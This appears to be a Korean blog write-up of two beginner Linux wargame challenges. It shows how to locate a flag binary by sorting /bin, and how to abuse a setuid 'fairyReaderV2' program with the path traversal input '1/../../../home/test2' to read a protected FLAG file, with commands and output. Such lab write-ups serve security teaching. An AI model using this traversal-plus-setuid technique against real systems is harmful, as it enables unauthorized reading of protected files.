728x90
반응형
Q1
- ssh, binary file, 디렉토리 구조, 정렬
1. ssh 접속
$ ssh test1@ssh.knock-on.org
...
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...
test1@5f882d6040af:~$
2. 힌트 확인
test1@a7c4fa4b85a6:~$ ls
HINT
test1@a7c4fa4b85a6:~$ cat HINT
Some binaries appear to print flags..
3. /bin와 같은 binary가 담기는 디렉토리에 flag가 있음을 예상
하지만 /bin 뿐만 아니라, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin, /opt 등 바이너리 파일은 다양한 디렉토리에 있음
-> 이걸 다 뒤지면서 모든 바이너리를 조사하기에는 시간이 많이 걸림
test1@5f882d6040af:/bin$ ls -al
total 22180
drwxr-xr-x 1 root root 4096 Feb 24 03:48 .
drwxr-xr-x 1 root root 4096 Feb 12 14:02 ..
-rwxr-xr-x 1 root root 51648 Jan 8 14:56 '['
-rwxr-xr-x 1 root root 14712 Feb 21 2022 addpart
-rwxr-xr-x 1 root root 18824 Oct 6 08:53 apt
-rwxr-xr-x 1 root root 84448 Oct 6 08:53 apt-cache
-rwxr-xr-x 1 root root 27104 Oct 6 08:53 apt-cdrom
-rwxr-xr-x 1 root root 27024 Oct 6 08:53 apt-config
-rwxr-xr-x 1 root root 51680 Oct 6 08:53 apt-get
-rwxr-xr-x 1 root root 28173 Oct 6 08:53 apt-key
-rwxr-xr-x 1 root root 51680 Oct 6 08:53 apt-mark
...
# 너무 많다!
4. 검색 결과 정렬
출제자가 만든 binary는 최근에 만들어졌을 것이란 점을 이용
ls -lt와 같이 시간 순으로 정렬을 하여 해결
또는 flag, test 등등 유추할 수 있는 키워드를 탐색해서 해결할 수 있다.
test1@5f882d6040af:/bin$ ls -lt
total 22164
-rwxr-xr-x 1 root root 15968 Feb 24 03:47 echoflag
-rwxr-xr-x 1 root root 320 Feb 12 14:06 man
lrwxrwxrwx 1 root root 23 Feb 12 14:03 pager -> /etc/alternatives/pager
...
# 가장 최근에 만들어진 echoflag라는 애 이름이 수상하다!test1@5f882d6040af:/bin$ find . -name "*flag*"
./echoflag
5. 찾은 binary 실행
test1@5f882d6040af:/bin$ ./echoflag
Wow you find it! the flag is KNOCKON{y0u_und3rst4nd_ab0ut_/b1n}
Q2
- ssh, setuid, find, 상대 경로
1. ssh 접속
$ ssh test2@ssh.knock-on.org
...
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...
test2@4f882e6020ad:~$
2. 힌트 확인
test2@c260433388cb:~$ ls
FLAG HINT
test2@c260433388cb:~$ ./FLAG
bash: ./FLAG: Permission denied
test2@c260433388cb:~$ cat HINT
Finding a filename with 'Reader' in it might bring good fortune..
3. find로 "Reader"라는 문자열이 들어간 프로그램을 탐색
- / : 가장 상위 디렉토리 기준 하위 디렉토리를 재귀적으로 탐색
- -type f: 파일만 탐색
- -name "*Reader*" : 정규표현식을 통해 이름에 Reader가 들어간 파일 탐색
- 2>/dev/null: 불필요한 오류 무시
$ find / -type f -name "*Reader*" 2>/dev/null
/opt/fairyReaderV2
4. 해당 프로그램이 setuid 비트가 들어감을 확인
- setuid란 간단히 말하자면, 해당 프로그램 실행 시에만 임시적으로 root권한을 얻을 수 있게 하는 장치
- 기존의 FLAG에 권한이 없어서 접근 못했는데 이걸 통해서 접근할 수 있겠구나 생각!
- ls 결과를 보면 x 대신에 s가 들어간 모습을 통해 setuid가 설정됨을 알 수 있다.
test2@e3a6f21df709:$ ls -l /opt/fairyReaderV2
-rwsrwsr-x 1 root root 16344 Feb 24 08:15 fairyReaderV2
5. 프로그램을 실행시켜 보면 /opt/data/story를 기준으로 뒤의 입력값을 붙여서 그 위치의 파일을 실행시킨다는 것을 알 수 있음
찾고자 하는 플래그가 있는 위치까지 이동시켜보자!
test2@c260433388cb:/opt$ ./fairyReaderV2
I'll tell you a dreamlike fairy tale :)
Let me know which Episode you'd like to hear!
Input Episode number (1~10) : 1
Once upon a time, in a small town nestled between rolling hills and sparkling rivers, lived a cat named Whiskers. Whiskers was not your ordinary cat. He had a peculiar habit of walking backwards. It was a sight that amused many but bewildered even more.
Book is in here! -> /opt/data/story1/FLAG
Input Episode number (1~10) : 2
Every morning, Whiskers would start his day by stretching his legs, always backwards, then proceed to the kitchen where his bowl awaited. Instead of eating immediately, he'd circle the bowl three times, counterclockwise, before taking a single bite. Then, he'd sit by the window, gazing outside, contemplating the mysteries of the universe, or perhaps just watching the birds.
Book is in here! -> /opt/data/story2/FLAG
Input Episode number (1~10) : 3
The townsfolk had grown accustomed to Whiskers and his odd ways. Children would giggle as they watched him, and adults would shake their heads in disbelief. But there was something about Whiskers that everyone admired. Despite his peculiarities, he carried himself with an air of confidence.
Book is in here! -> /opt/data/story3/FLAG
Input Episode number (1~10) : 4
One day, a traveling circus came to town, bringing with it wonders from around the world. The circus had a magician who claimed he could communicate with animals. Intrigued, the townspeople urged him to speak with Whiskers.
Book is in here! -> /opt/data/story4/FLAG
Input Episode number (1~10) : 5
The magician, a tall man with a top hat adorned with stars, agreed. He sat down with Whiskers, and to everyone's astonishment, they seemed to engage in a deep, albeit silent, conversation. After a few moments, the magician stood up and announced, "Whiskers has shared with me the secret of his backward walk."
Book is in here! -> /opt/data/story5/FLAG
Input Episode number (1~10) : 6
The crowd leaned in, eager to hear the wisdom imparted by their backward-walking cat. "Whiskers walks backwards to remind us that sometimes in life, we need to take a step back to truly appreciate where we are and where we're going," the magician declared.
Book is in here! -> /opt/data/story6/FLAG
Input Episode number (1~10) : 7
There was a moment of silence as the townsfolk processed this revelation. Then, almost as one, they erupted in applause. Whiskers, seemingly unfazed by his newfound fame, simply yawned and sauntered off, backwards as always, leaving behind a trail of smiles and a slightly less ordinary town.
Book is in here! -> /opt/data/story7/FLAG
Input Episode number (1~10) : 8
From that day forward, the people of the town occasionally tried walking backwards, just like Whiskers. They found that it indeed offered a new perspective on the world around them. While not everyone adopted the practice permanently, it served as a reminder of the lesson Whiskers had, in his own unique way, taught them: sometimes, a different approach can reveal beauty and truths previously unnoticed.
Book is in here! -> /opt/data/story8/FLAG
Input Episode number (1~10) : 9
And so, life in the small town went on, enriched by the presence of a cat who dared to walk differently. Whiskers continued his backward strolls, a small figure moving against the tide, inspiring those who watched him to occasionally glance back and appreciate the path they'd traveled.
Book is in here! -> /opt/data/story9/FLAG
Input Episode number (1~10) : 10
Actually, the `story` is related only to getting the FLAG.
Book is in here! -> /opt/data/story10/FLAG
Input Episode number (1~10) : asdf
No book in here! -> /opt/data/storyasdf/FLAG
Input Episode number (1~10) : 1/../../../home/test2
KNOCKON{f41ry_t4l3_1s_s000000_b0r1ng!!}
Book is in here! -> /opt/data/story1/../../../home/test2/FLAG이 실행파일이 실행시키는 파일들의 위치는 일단 /opt/data/story를 기본으로 시작하는데 data 폴더에는 story1~10가지의 폴더가 있음. 그 안에는 FLAG 파일이 있고, 그 파일을 실행시키면 위의 동화가 나옴. 그렇기에 우리가 원하는 목적지에 있는 폴더에 접근해 그곳의 FLAG를 여는 것임. /opt/data/story1을 기준으로(1~10 다 상관없음) ../ 하면 /opt/data 또 ../하면 /opt 또 ../하면 최상위 디렉토리에 위치하게 될 것이고. 우리가 찾고자하는 FLAG는 /home/test2에 있었으니까 그곳까지 이동시키고 거기에 있는 FLAG를 실행하도록 하는 것임
728x90
반응형